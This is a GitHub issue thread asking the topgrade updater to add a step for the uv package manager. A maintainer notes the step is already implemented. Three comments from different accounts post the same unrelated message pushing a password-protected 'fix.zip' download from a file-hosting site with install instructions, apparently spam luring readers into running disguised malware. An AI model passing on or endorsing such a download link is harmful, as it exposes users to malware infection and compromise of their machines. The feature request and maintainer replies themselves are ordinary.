### ISSUE TITLE
Support for UV package manager

### ISSUE THREAD

**Issue by FlyinPancake** [topgrade-rs/topgrade#895]
## I want to suggest a new step

* Which tool is this about? Where is its repository? 
    uv is an extremely fast Python package and project manager, written in Rust. 
    [uv](https://github.com/astral-sh/uv)
* Which operating systems are supported by this tool? 
    Windows, Linux, macOs
* What should Topgrade do to figure out if the tool needs to be invoked? 
    check if uv is installed
* Which exact commands should Topgrade run? 
 ```bash
# to update tools installed by uv
uv tool update --all
```
* Does it have a `--dry-run` option? i.e., print what should be done and exit
    It does not have a dry run
* Does it need the user to confirm the execution? And does it provide a `--yes` option to skip this step?
    It does not neet a `-y` flag

## More information

I can test a branch of this project.

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SteveLauC** [comment]
Implemented in #890.

**Comment by FlyinPancake** [comment]
Thank you for being so quick!
